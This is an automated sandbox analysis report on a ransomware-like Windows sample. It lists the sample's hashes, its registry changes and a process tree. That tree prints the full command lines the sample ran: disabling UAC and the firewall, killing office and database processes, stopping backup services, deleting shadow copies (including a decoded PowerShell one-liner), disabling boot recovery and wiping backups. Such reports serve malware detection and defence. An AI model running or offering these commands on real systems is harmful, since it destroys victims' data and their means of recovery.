Analysis
max time kernel: 121s
max time network: 124s
platform: windows10_x64
resource: win10
submitted: 22/07/2020, 08:54

Static task: static1

Behavioral task: behavioral1
Sample: Deniz_K_z_.bin.exe
Resource: win7
0 signatures
0 seconds

Behavioral task: behavioral2
Sample: Deniz_K_z_.bin.exe
Resource: win10
0 signatures
0 seconds

General
Target: Deniz_K_z_.bin.exe
Size: 3.4MB
MD5: fc78e6e58352151fb77a4b92f239d381
SHA1: 4dda3af9601922394f0c16713180beb2ec88c050
SHA256: c8d49d874454bf1fa50cb7e4c00677e028af38e1d22e41476634d5d5a349cd7e
SHA512: 4df0c69609087abc21be95574b6b09ff12253177a1dfee101ae7e24aa754d494fc837c41cfe636a686b644c9ebe7bf79fe805478ed75ee66a183208f7b3ca489
Score: 10/10
Malware Config

Signatures

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Deniz_K_z_.bin.exe

System policy modification 1 TTPs 17 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption = "0" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" | Deniz_K_z_.bin.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "0" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "1" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" | Deniz_K_z_.bin.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "1" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "5" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "1" | Deniz_K_z_.bin.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\undockwithoutlogon = "1" | Deniz_K_z_.bin.exe
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
2996 | vssadmin.exe
3768 | vssadmin.exe
3092 | vssadmin.exe
Kills process with taskkill 14 IoCs
pid | Process
868 | taskkill.exe
3172 | taskkill.exe
1644 | taskkill.exe
3852 | taskkill.exe
3728 | taskkill.exe
3692 | taskkill.exe
3852 | taskkill.exe
1008 | taskkill.exe
1760 | taskkill.exe
2020 | taskkill.exe
864 | taskkill.exe
2992 | taskkill.exe
2908 | taskkill.exe
1004 | taskkill.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Modifies service 2 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Suspicious use of WriteProcessMemory 177 IoCs
Drops file in Drivers directory 1 IoCs
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\host | Deniz_K_z_.bin.exe

Disables Task Manager via registry modification

Runs net.exe
Suspicious use of AdjustPrivilegeToken 62 IoCs
Program crash 1 IoCs
pid | pid_target | Process | procid_target
656 | 3512 | WerFault.exe | 89

Suspicious behavior: EnumeratesProcesses 15 IoCs
pid | Process
656 | WerFault.exe (same entry repeated 15 times)

Modifies Windows Firewall 1 TTPs

Processes
C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"
  - Checks whether UAC is enabled
  - System policy modification
  - Suspicious use of WriteProcessMemory
  - Drops file in Drivers directory
  PID: 976

    C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
      - Suspicious use of WriteProcessMemory
      PID: 3448

        C:\Windows\SysWOW64\netsh.exe
          cmdline: netsh firewall set opmode disable
          PID: 2052
    C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
      - Suspicious use of WriteProcessMemory
      PID: 3848

        C:\Windows\SysWOW64\vssadmin.exe
          cmdline: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
          - Interacts with shadow copies
          PID: 3092

    C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
      - Suspicious use of WriteProcessMemory
      PID: 3928

        C:\Windows\SysWOW64\vssadmin.exe
          cmdline: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
          - Interacts with shadow copies
          PID: 3768
    C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
      - Suspicious use of WriteProcessMemory
      PID: 3276

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im sql.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 3692

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im winword.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2020

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im wordpad.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2908

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im outlook.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 3852

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im thunderbird.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 864

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im oracle.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 1008

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im excel.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 868

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im onenote.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2992

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im virtualboxvm.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 1004

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im node.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 3172

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im QBW32.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 1760

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im WBGX.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 3852

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im Teams.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 1644

        C:\Windows\SysWOW64\taskkill.exe
          cmdline: taskkill /f /im Flow.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 3728
    C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
      - Suspicious use of WriteProcessMemory
      PID: 3620

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop DbxSvc
          - Suspicious use of WriteProcessMemory
          PID: 3796

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop DbxSvc
              PID: 648

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop OracleXETNSListener
          - Suspicious use of WriteProcessMemory
          PID: 3356

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop OracleXETNSListener
              PID: 408

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop OracleServiceXE
          - Suspicious use of WriteProcessMemory
          PID: 2908

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop OracleServiceXE
              PID: 1140

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop AcrSch2Svc
          - Suspicious use of WriteProcessMemory
          PID: 1644

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop AcrSch2Svc
              PID: 3788

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop AcronisAgent
          PID: 3848

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop AcronisAgent
              PID: 2020

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop Apache2.4
          PID: 3784

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop Apache2.4
              PID: 1440

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop SQLWriter
          PID: 3292

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop SQLWriter
              PID: 408

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop MSSQL$SQLEXPRESS
          PID: 2204

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
              PID: 1132

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop MSSQLServerADHelper100
          PID: 3824

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop MSSQLServerADHelper100
              PID: 564

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop MongoDB
          PID: 1744

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop MongoDB
              PID: 3896

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop SQLAgent$SQLEXPRESS
          PID: 1644

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
              PID: 1168

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop SQLBrowser
          PID: 2436

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop SQLBrowser
              PID: 1844

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop CobianBackup11
          PID: 648

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop CobianBackup11
              PID: 2812

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop cbVSCService11
          PID: 2880

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop cbVSCService11
              PID: 3864

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop QBCFMontorService
          PID: 1936

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop QBCFMontorService
              PID: 3192

        C:\Windows\SysWOW64\net.exe
          cmdline: net stop QBVSS
          PID: 1508

            C:\Windows\SysWOW64\net1.exe
              cmdline: C:\Windows\system32\net1 stop QBVSS
              PID: 3868
    C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious use of WriteProcessMemory
      PID: 3504

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
          (the -e argument is base64-encoded UTF-16LE PowerShell; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , a third shadow-copy deletion path alongside the vssadmin and wmic commands seen elsewhere in this tree)
          PID: 3512

            C:\Windows\SysWOW64\WerFault.exe
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 700
              - Suspicious use of AdjustPrivilegeToken
              - Program crash
              - Suspicious behavior: EnumeratesProcesses
              PID: 656
    C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
      - Suspicious use of WriteProcessMemory
      PID: 2572

        C:\Windows\SysWOW64\vssadmin.exe
          cmdline: vssadmin delete shadows /all /quiet
          - Interacts with shadow copies
          PID: 2996

        C:\Windows\SysWOW64\Wbem\WMIC.exe
          cmdline: wmic shadowcopy delete
          - Suspicious use of AdjustPrivilegeToken
          PID: 512
C:\Windows\system32\vssvc.exe
  cmdline: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
  PID: 3644